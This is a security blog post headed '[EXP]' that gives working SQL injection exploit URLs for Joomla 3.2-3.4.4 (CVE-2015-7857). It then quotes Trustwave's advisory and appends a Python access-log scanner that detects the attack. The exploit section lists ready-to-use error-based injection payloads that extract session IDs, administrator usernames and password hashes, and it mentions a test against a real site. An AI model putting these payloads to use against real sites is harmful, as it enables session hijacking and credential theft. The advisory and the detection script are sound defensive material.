K8拉登哥哥's Blog

K8team: information security, network security, 0day vulnerabilities, penetration testing, hacking

[EXP] Joomla 3.2-3.4.4 SQL injection vulnerability

2015-10-23 17:51:41 | Category: Web_0day

FILE: /administrator/components/com_contenthistory/models/history.php is vulnerable to SQL injection:

EXP
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1 &list[select]= (select 1 FROM(select count(*),concat((select (select concat(session_id)) FROM pblqz_session LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Retrieving the administrator password
/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(username)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=(select 1 from (select count(*),concat((select (select concat(password)) from %23__users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

Response page from a real-world test against a site (screenshot)

POC
index.php?option=com_contenthistory&view=history&list[select]=1

3.2.0 local response page (screenshot)

https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/

Trustwave SpiderLabs researcher Asaf Orpani has discovered an SQL injection vulnerability in versions 3.2 through 3.4.4 of Joomla, a popular open-source Content Management System (CMS). Combining that vulnerability with other security weaknesses, our Trustwave SpiderLabs researchers are able to gain full administrative access to any vulnerable Joomla site.

Joomla had a 6.6 percent share of the market for website CMSs as of October 20, 2015 according to W3Techs—second only to WordPress. Internet services company BuiltWith estimates that as many as 2.8 million websites worldwide use Joomla.

CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858 cover the SQL injection vulnerability and various mutations related to it.

CVE-2015-7857 enables an unauthorized remote user to gain administrator privileges by hijacking the administrator session. Following exploitation of the vulnerability, the attacker may gain full control of the web site and execute additional attacks.

    The vulnerability can be exploited in Joomla versions 3.2 (released in November 2013) through version 3.4.4.
    Because the vulnerability is found in a core module that doesn't require any extensions, all websites that use Joomla versions 3.2 and above are vulnerable.
    Asaf also uncovered the related vulnerabilities CVE-2015-7858 and CVE-2015-7297 as part of his research.

Trustwave SpiderLabs recommends that ALL Joomla users update their Joomla installations to version 3.4.5. Version 3.4.5 is dedicated to fixing this security issue and was released Thursday, October 22 at approximately 14:00 UTC.
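
Besides upgrading, the request shape shown in the POC above can be searched for in web-server access logs. The following is an added example, not part of the original post or of Joomla: it flags requests that address com_contenthistory and set list[select]. The combined log format, the sample lines and the SQL keyword list are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Combined-log-format line: client, two fields, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')
# Assumed keyword list: SQL tokens that have no place in a column-list parameter
SQL_HINTS = re.compile(r"\b(select|union|concat|information_schema|floor|rand)\b", re.I)

def classify(target):
    """Return None, 'probe' or 'injection' for one request target."""
    query = target.partition("?")[2]
    # parse_qsl percent-decodes names and values, so list%5Bselect%5D is seen too
    params = {k.lower(): v for k, v in parse_qsl(query, keep_blank_values=True)}
    if params.get("option", "").lower() != "com_contenthistory":
        return None
    value = params.get("list[select]")
    if value is None:
        return None
    return "injection" if SQL_HINTS.search(value) else "probe"

def scan(log_text):
    """Return (client, verdict, status) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m.group(2))
        if verdict:
            hits.append((m.group(1), verdict, m.group(3)))
    return hits

# Constructed sample lines (documentation IP ranges, shortened payload)
SAMPLE_LOG = """\
192.0.2.10 - - [23/Oct/2015:10:00:01 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 5120
198.51.100.7 - - [23/Oct/2015:10:00:05 +0000] "GET /index.php?option=com_contenthistory&view=history&list%5Bselect%5D=1 HTTP/1.1" 500 1830
198.51.100.7 - - [23/Oct/2015:10:00:09 +0000] "GET /index.php?option=com_contenthistory&view=history&item_id=1&type_id=1&list[select]=(select%201%20from%20information_schema.tables) HTTP/1.1" 500 2210
"""

if __name__ == "__main__":
    for client, verdict, status in scan(SAMPLE_LOG):
        print(f"{client} {verdict} status={status}")
```

This only inspects the query string recorded in the access log; parameters sent in a request body need WAF or application-level logging to be seen.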